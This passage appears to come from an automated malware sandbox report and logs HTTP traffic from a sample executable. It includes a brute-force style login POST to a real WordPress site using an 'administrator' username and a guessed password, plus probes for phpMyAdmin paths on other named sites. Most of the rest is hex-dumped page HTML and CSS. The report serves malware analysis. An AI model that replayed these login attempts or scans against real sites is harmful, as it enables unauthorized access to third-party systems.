                                                                                                                                                                                                    Host: coralparkchristian.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=tdc162qtbgvjr05eq5aoaditjn
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://coralparkchristian.org/wp-login.php
                                                                                                                                                                                                    Content-Length: 143
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC143OUTData Raw: 6c 6f 67 3d 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 26 70 77 64 3d 54 30 4a 52 58 34 57 54 53 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 63 6f 72 61 6c 70 61 72 6b 63 68 72 69 73 74 69 61 6e 2e 6f 72 67 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=administrator&pwd=T0JRX4WTS&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Fcoralparkchristian.org%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC522INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 36 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 72 2d 63 66 2d 6c 69 73 74 5f 65 6d 61 69 6c 5f 73 65 6e 64 5f 74 6f 3d 64 65 6c 65 74 65 64 3b
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:46 GMTServer: ApachePragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wr-cf-list_email_send_to=deleted;
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC4226INData Raw: 31 30 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 69 65 38 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 38 29 20 5d 3e 3c 21 2d 2d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e
                                                                                                                                                                                                    Data Ascii: 107a<!DOCTYPE html>...[if IE 8]><html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US"><![endif]-->...[if !(IE 8) ]>...><html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">...<![endif]--><head><meta http-equiv="Con
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    499192.168.2.45266266.235.200.1474436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC257OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: tradeavenida.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: _cfuvid=tDrWrpYz0sQSHfLN2QI5clVhMz.ytyo40IGQr8aDz4A-1700978385868-0-604800000
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC505INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https:/
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC864INData Raw: 37 64 61 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20
                                                                                                                                                                                                    Data Ascii: 7da4<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8">...[if IE]><meta http-equiv='X-UA-Compatible' content='IE=edge,chrome=1'><![endif]--><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><link
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC1369INData Raw: 75 63 68 2d 69 63 6f 6e 5f 37 36 78 37 36 2e 70 6e 67 22 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 35 32 78 31 35 32 22 20 68 72 65 66 3d 22 2f 2f 74 72 61 64 65 61 76 65 6e 69 64 61 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 6f 72 74 6f 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 5f 31 35 32 78 31 35 32 2e 70 6e 67 22 3e 0a 09 09 09 09 09 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 2b 20 27 20 79 65 73 2d 6a 73
                                                                                                                                                                                                    Data Ascii: uch-icon_76x76.png"><link rel="apple-touch-icon" sizes="152x152" href="//tradeavenida.com/wp-content/themes/porto/images/logo/apple-touch-icon_152x152.png"><script>document.documentElement.className = document.documentElement.className + ' yes-js
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC1369INData Raw: 66 69 6c 6c 54 65 78 74 28 6e 2c 30 2c 30 29 2c 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 29 3b 72 65 74 75 72 6e 20 74 2e 65 76 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 72 5b 74 5d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 2c 6e 29 7b 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 22 66 6c 61 67 22 3a 72 65 74 75 72 6e 20 6e 28 65 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 33 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 32 36 61 37 5c 75 66 65 30 66 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 33 5c 75 66 65 30 66 5c 75 32 30 30 62 5c 75 32 36
                                                                                                                                                                                                    Data Ascii: fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC1369INData Raw: 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 3c 65 2e 74 69 6d 65 73 74 61 6d 70 2b 36 30 34 38 30 30 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 29 72 65 74 75 72 6e 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 7d 63 61 74 63 68 28 65 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 28 29 3b 69 66 28 21 6e 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 4f 66 66 73 63 72 65 65 6e 43 61 6e 76 61 73
                                                                                                                                                                                                    Data Ascii: Item(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC1369INData Raw: 2e 6a 71 75 65 72 79 2e 63 73 73 3f 76 65 72 3d 32 2e 32 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67 2e 65 6d 6f 6a 69 20 7b 0a 09 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 77 69 64 74 68 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 6d 61 72 67 69 6e 3a 20
                                                                                                                                                                                                    Data Ascii: .jquery.css?ver=2.21' media='all' /><style id='wp-emoji-styles-inline-css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin:
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC1369INData Raw: 62 6f 74 74 6f 6d 3a 34 70 78 20 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 34 70 78 20 73 6f 6c 69 64 3b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 37 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 66 6f 6f 74 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65
                                                                                                                                                                                                    Data Ascii: bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC1369INData Raw: 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 68 7b 77 6f 72 64 2d 62 72 65 61 6b 3a 6e 6f 72 6d 61 6c 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 36 35 29 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63
                                                                                                                                                                                                    Data Ascii: lock-table td,.wp-block-table th{word-break:normal}.wp-block-table figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video figcaption{color:#555;font-size:13px;text-align:c
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC1369INData Raw: 20 23 46 46 46 46 46 46 3b 0a 09 2d 2d 79 69 74 68 2d 77 63 61 6e 2d 66 69 6c 74 65 72 73 5f 63 6f 6c 6f 72 73 5f 61 63 63 65 6e 74 3a 20 23 41 37 31 34 34 43 3b 0a 09 2d 2d 79 69 74 68 2d 77 63 61 6e 2d 66 69 6c 74 65 72 73 5f 63 6f 6c 6f 72 73 5f 61 63 63 65 6e 74 5f 72 3a 20 31 36 37 3b 0a 09 2d 2d 79 69 74 68 2d 77 63 61 6e 2d 66 69 6c 74 65 72 73 5f 63 6f 6c 6f 72 73 5f 61 63 63 65 6e 74 5f 67 3a 20 32 30 3b 0a 09 2d 2d 79 69 74 68 2d 77 63 61 6e 2d 66 69 6c 74 65 72 73 5f 63 6f 6c 6f 72 73 5f 61 63 63 65 6e 74 5f 62 3a 20 37 36 3b 0a 09 2d 2d 79 69 74 68 2d 77 63 61 6e 2d 63 6f 6c 6f 72 5f 73 77 61 74 63 68 65 73 5f 62 6f 72 64 65 72 5f 72 61 64 69 75 73 3a 20 31 30 30 25 3b 0a 09 2d 2d 79 69 74 68 2d 77 63 61 6e 2d 63 6f 6c 6f 72 5f 73 77 61 74 63
                                                                                                                                                                                                    Data Ascii: #FFFFFF;--yith-wcan-filters_colors_accent: #A7144C;--yith-wcan-filters_colors_accent_r: 167;--yith-wcan-filters_colors_accent_g: 20;--yith-wcan-filters_colors_accent_b: 76;--yith-wcan-color_swatches_border_radius: 100%;--yith-wcan-color_swatc
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC1369INData Raw: 65 20 61 2e 66 61 63 65 62 6f 6f 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 39 35 39 39 45 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 39 35 39 39 45 3b 7d 2e 79 69 74 68 2d 77 63 77 6c 2d 73 68 61 72 65 20 61 2e 66 61 63 65 62 6f 6f 6b 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 39 35 39 39 45 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 39 35 39 39 45 3b 7d 2e 79 69 74 68 2d 77 63 77 6c 2d 73 68 61 72 65 20 61 2e 74 77 69 74 74 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 34 35 41 46 45 32 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 35 41 46 45 32 3b 7d 2e 79 69 74 68 2d 77 63 77 6c 2d 73 68 61 72 65 20 61 2e 74 77 69 74 74 65 72 3a 68 6f 76 65 72 7b 62 61 63 6b
                                                                                                                                                                                                    Data Ascii: e a.facebook{background: #39599E; background-color: #39599E;}.yith-wcwl-share a.facebook:hover{background: #39599E; background-color: #39599E;}.yith-wcwl-share a.twitter{background: #45AFE2; background-color: #45AFE2;}.yith-wcwl-share a.twitter:hover{back


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    500192.168.2.452720144.202.62.1314436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC174OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: gruporegiosafety.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:49 UTC1483INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 36 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4d 65 74 68 6f 64 73 3a 20 47 45 54 2c 50 4f 53 54 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2c 20 41
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:46 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Access-Control-Allow-Methods: GET,POSTAccess-Control-Allow-Headers: Content-Type, A
                                                                                                                                                                                                    2023-11-26 05:59:49 UTC6709INData Raw: 33 39 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 4d 58 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 72 75 70 6f 72 65 67 69 6f 73 61 66 65 74 79 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45
                                                                                                                                                                                                    Data Ascii: 391a<!DOCTYPE html><html lang="es-MX"><head><meta charset="UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="pingback" href="https://gruporegiosafety.com/xmlrpc.php" /><script type="text/javascript">document.documentE
                                                                                                                                                                                                    2023-11-26 05:59:49 UTC7915INData Raw: 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 3a 20 23 66 37 38 64 61 37 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72
                                                                                                                                                                                                    Data Ascii: global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--pr
                                                                                                                                                                                                    2023-11-26 05:59:49 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:49 UTC8192INData Raw: 31 66 34 30 0d 0a 2d 63 79 61 6e 2d 62 6c 75 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 74 6f 2d 76 69 76
                                                                                                                                                                                                    Data Ascii: 1f40-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-viv
                                                                                                                                                                                                    2023-11-26 05:59:49 UTC7822INData Raw: 65 66 74 20 2e 65 74 5f 70 62 5f 62 75 74 74 6f 6e 3a 61 66 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6c 65 66 74 3a 31 65 6d 7d 2e 65 74 5f 62 75 74 74 6f 6e 5f 69 63 6f 6e 5f 76 69 73 69 62 6c 65 2e 65 74 5f 62 75 74 74 6f 6e 5f 6c 65 66 74 20 2e 65 74 5f 70 62 5f 62 75 74 74 6f 6e 2c 2e 65 74 5f 62 75 74 74 6f 6e 5f 6c 65 66 74 20 2e 65 74 5f 70 62 5f 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 2e 65 74 5f 62 75 74 74 6f 6e 5f 6c 65 66 74 20 2e 65 74 5f 70 62 5f 6d 6f 64 75 6c 65 20 2e 65 74 5f 70 62 5f 62 75 74 74 6f 6e 3a 68 6f 76 65 72 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 65 6d 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 2e 37 65 6d 7d 2e 65 74 5f 62 75 74 74 6f 6e 5f 69 63 6f 6e 5f 76 69 73 69 62 6c 65 2e 65 74 5f 62 75 74 74 6f 6e
                                                                                                                                                                                                    Data Ascii: eft .et_pb_button:after{margin-left:0;left:1em}.et_button_icon_visible.et_button_left .et_pb_button,.et_button_left .et_pb_button:hover,.et_button_left .et_pb_module .et_pb_button:hover{padding-left:2em;padding-right:.7em}.et_button_icon_visible.et_button
                                                                                                                                                                                                    2023-11-26 05:59:49 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
